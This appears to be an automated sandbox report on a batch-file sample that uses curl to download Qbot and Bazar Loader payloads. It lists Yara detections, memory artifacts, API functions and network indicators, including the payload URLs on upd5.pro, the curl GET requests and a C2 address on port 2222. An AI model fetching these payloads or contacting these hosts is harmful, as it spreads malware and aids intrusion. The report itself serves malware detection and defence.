Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Bazar Loader

Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740122551.0000018984731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Qbot

Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740153839.0000018984734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740300202.00000189849C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740238507.0000018984761000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018007BAC0 bind,WSAGetLastError,WSAGetLastError,

3_2_000000018007BAC0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.77.68.166	upd5.pro	United States	20473	AS-CHOOPAUS	false
138.1.33.162	oracle.com	United States	31898	ORACLE-BMC-31898US	false
62.204.41.234	unknown	United Kingdom	30798	TNNET-ASTNNetOyMainnetworkFI	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
upd5.pro	45.77.68.166	true
oracle.com	138.1.33.162	true
www.oracle.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://upd5.pro/update/02.dll	false	8%, Virustotal, Browse	unknown
https://oracle.com/	false		high
https://upd5.pro/update/qd_x86.exe	false	7%, Virustotal, Browse	unknown

AV Detection

Multi AV Scanner detection for domain / URL

Source: https://upd5.pro/update/02.dll	Virustotal: Detection: 7%			Perma Link
Source: https://upd5.pro/update/qd_x86.exe	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\qd_x86.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\Desktop\qd_x86.exe	Virustotal: Detection: 42%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\qd_x86.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800750F0 CryptAcquireContextA,GetLastError,CryptGenRandom,

3_2_00000001800750F0

Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.1.33.162:443 -> 192.168.2.4:49736 version: TLS 1.2

Source:	Binary string: conhost.pdbUGP source: 02.dll.2.dr
Source:	Binary string: Z:\j\projects\qbot4\Release\Win32\qd_x86.pdb source: qd_x86.exe, 00000008.00000000.1799435968.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe, 00000008.00000002.1800368210.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe.5.dr
Source:	Binary string: C:\testing3\data\bdnc\BDNIMBUS-3071711\BDNIMBUS\bin\release\bdnc.pdb source: rundll32.exe, 00000003.00000002.1739313508.0000000180252000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: conhost.pdb source: 02.dll.2.dr

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D98074 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

8_2_00D98074

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49742 -> 62.204.41.234:2222

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 138.1.33.162 138.1.33.162

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.234

Source: global traffic	HTTP traffic detected: GET /update/02.dll HTTP/1.1Host: upd5.proUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /update/qd_x86.exe HTTP/1.1Host: upd5.proUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: oracle.comCache-Control: no-cache

Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: <li class="scl-facebook"><a data-lbl="scl-icon:facebook" href="https://www.facebook.com/Oracle/" equals www.facebook.com (Facebook)
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: <li class="scl-linkedin"><a data-lbl="scl-icon:linkedin" href="https://www.linkedin.com/company/oracle/" equals www.linkedin.com (Linkedin)
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: <li class="scl-youtube"><a data-lbl="scl-icon:you-tube" href="https://www.youtube.com/oracle/" equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: upd5.pro

Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://academy.oracle.com/en/oa-web-overview.html
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://c.go-mpulse.net
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://consent.trustarc.com
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://d.oracleinfinity.io
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://dc.oracleinfinity.io
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://developer.oracle.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://developer.oracle.com/python/what-is-python/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://go.oracle.com/subscriptions
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://investor.oracle.com/home/default.aspx
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://oracle.112.2o7.net
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://profile.oracle.com/myprofile/account/create-account.jspx
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://s.go-mpulse.net
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://s.go-mpulse.net/boomerang/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://s2.go-mpulse.net/boomerang/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://search.oracle.com/events?q=&lang=english
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://search.oracle.com/results
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://search.oracle.com/results?q=u30searchterm&size=10&page=1&tab=all
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://secure.ethicspoint.com/domain/media/en/gui/31053/index.html
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://support.apple.com/downloads/safari
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tags.tiqcdn.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/main/dev/utag.js
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/main/prod/utag.js
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://tms.oracle.com/main/prod/utag.sync.js
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://twitter.com/oracle
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1705403839.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1705969959.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1705469913.00000148613AB000.00000004.00000020.00020000.00000000.sdmp, u2.bat	String found in binary or memory: https://upd5.pro/update/02.dll
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dll)
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllLE_S
Source: curl.exe, 00000002.00000002.1705793371.0000014861370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllWinsta0
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllcej
Source: curl.exe, 00000002.00000002.1705793371.0000014861370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllcurl
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllg5m
Source: curl.exe, 00000002.00000002.1705793371.0000014861377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/02.dllws
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1757932601.000001B929406000.00000004.00000020.00020000.00000000.sdmp, u2.bat	String found in binary or memory: https://upd5.pro/update/qd_x86.exe
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exe)
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exeWinsta0
Source: curl.exe, 00000005.00000003.1757684017.000001B929403000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1757932601.000001B929406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exeb
Source: curl.exe, 00000005.00000002.1757932601.000001B9293F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.execurl
Source: curl.exe, 00000005.00000002.1758052563.000001B92943C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upd5.pro/update/qd_x86.exee
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.google.com/chrome/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.linkedin.com/company/oracle/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/new/
Source: wermgr.exe, 00000004.00000003.1797652770.0000022090DE3000.00000004.00000020.00020000.00000000.sdmp, upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-120.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-128.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-152.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-180.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-192.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/favicons/favicon-32.png
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/fonts/oraclesansvf.woff2
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/asset/web/fonts/redwoodicons.woff2
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/corporate/accessibility/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/upgrade-browser/
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.oracle.com/webapps/redirect/signon?nexturl=
Source: upgrade-browser[1].htm.4.dr	String found in binary or memory: https://www.youtube.com/oracle/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.77.68.166:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.1.33.162:443 -> 192.168.2.4:49736 version: TLS 1.2

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018002BAB0 NtAllocateVirtualMemory,NtProtectVirtualMemory,

3_2_000000018002BAB0

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E0A0	3_2_000000018001E0A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004D020	3_2_000000018004D020
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800040B0	3_2_00000001800040B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002F0C0	3_2_000000018002F0C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180030190	3_2_0000000180030190
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800D61A0	3_2_00000001800D61A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800201B0	3_2_00000001800201B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180009200	3_2_0000000180009200
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180083220	3_2_0000000180083220
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800164D0	3_2_00000001800164D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180004530	3_2_0000000180004530
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180250558	3_2_0000000180250558
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180244524	3_2_0000000180244524
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032550	3_2_0000000180032550
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180236540	3_2_0000000180236540
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022D588	3_2_000000018022D588
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031570	3_2_0000000180031570
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800475D0	3_2_00000001800475D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800195D0	3_2_00000001800195D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018023065C	3_2_000000018023065C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002F640	3_2_000000018002F640
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800576A0	3_2_00000001800576A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180036710	3_2_0000000180036710
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018024C700	3_2_000000018024C700
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180006760	3_2_0000000180006760
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180050770	3_2_0000000180050770
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800307D0	3_2_00000001800307D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002F800	3_2_000000018002F800
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018000C840	3_2_000000018000C840
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E920	3_2_000000018002E920
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022D95C	3_2_000000018022D95C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031950	3_2_0000000180031950
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032970	3_2_0000000180032970
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022E968	3_2_000000018022E968
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001802439F4	3_2_00000001802439F4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032B40	3_2_0000000180032B40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180020B50	3_2_0000000180020B50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031BB0	3_2_0000000180031BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002FBB0	3_2_000000018002FBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180048C20	3_2_0000000180048C20
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CC70	3_2_000000018001CC70
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031CB0	3_2_0000000180031CB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002FD10	3_2_000000018002FD10
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018022DD30	3_2_000000018022DD30
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180046DA0	3_2_0000000180046DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DDC0	3_2_000000018001DDC0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004FDE0	3_2_000000018004FDE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180030E40	3_2_0000000180030E40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002FE50	3_2_000000018002FE50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180243EA4	3_2_0000000180243EA4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474A534	3_2_000001898474A534
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847460C0	3_2_00000189847460C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898473C118	3_2_000001898473C118
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474833C	3_2_000001898474833C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984744398	3_2_0000018984744398
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898473540C	3_2_000001898473540C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984751D50	3_2_0000018984751D50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474CDC0	3_2_000001898474CDC0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898473CE00	3_2_000001898473CE00
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984735EF4	3_2_0000018984735EF4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898474F054	3_2_000001898474F054
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984750010	3_2_0000018984750010
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984753880	3_2_0000018984753880
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984744910	3_2_0000018984744910
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984739B44	3_2_0000018984739B44
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984745B9C	3_2_0000018984745B9C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984700040	3_2_0000018984700040
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898472055D	3_2_000001898472055D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898471B5CD	3_2_000001898471B5CD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898470B60D	3_2_000001898470B60D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984704701	3_2_0000018984704701
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898471D861	3_2_000001898471D861
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898471E81D	3_2_000001898471E81D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898472208D	3_2_000001898472208D
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984718D41	3_2_0000018984718D41
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847148CD	3_2_00000189847148CD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984716B49	3_2_0000018984716B49
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984712BA5	3_2_0000018984712BA5
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB21A0	8_2_00DB21A0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84243	8_2_00D84243
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA23EF	8_2_00DA23EF
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB44C0	8_2_00DB44C0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D845A2	8_2_00D845A2
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB0800	8_2_00DB0800
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84910	8_2_00D84910
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D6ABC1	8_2_00D6ABC1
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84C6F	8_2_00D84C6F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DBEC3F	8_2_00DBEC3F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DAAD5D	8_2_00DAAD5D
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D84FCD	8_2_00D84FCD
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D69068	8_2_00D69068
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D652FF	8_2_00D652FF
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DAD200	8_2_00DAD200
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA1370	8_2_00DA1370
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D8533A	8_2_00D8533A
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D85698	8_2_00D85698
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA18A0	8_2_00DA18A0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D8386E	8_2_00D8386E
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DBF9AF	8_2_00DBF9AF
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D85A8C	8_2_00D85A8C
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D83BB0	8_2_00D83BB0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DA1CF0	8_2_00DA1CF0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DADC08	8_2_00DADC08
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D65EEE	8_2_00D65EEE
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D9FE89	8_2_00D9FE89
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D85E8F	8_2_00D85E8F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D83F01	8_2_00D83F01

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D66E70 appears 62 times
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D92DA3 appears 56 times
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D61140 appears 54 times
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: String function: 00D91F12 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180026F00 appears 52 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00000001800D7120 appears 105 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018002B690 appears 297 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180043930 appears 40 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180227E80 appears 162 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00000001800C6790 appears 133 times

Source: 02.dll.2.dr

Source: classification engine

Classification label: mal100.troj.evad.winBAT@27/13@3/4

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018001CC70 CertOpenSystemStoreA,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,CertCloseStore,

3_2_000000018001CC70

Source: C:\Windows\System32\curl.exe

File created: C:\Users\user\Desktop\02.dll

Jump to behavior

Source: C:\Windows\System32\wermgr.exe	Mutant created: NULL
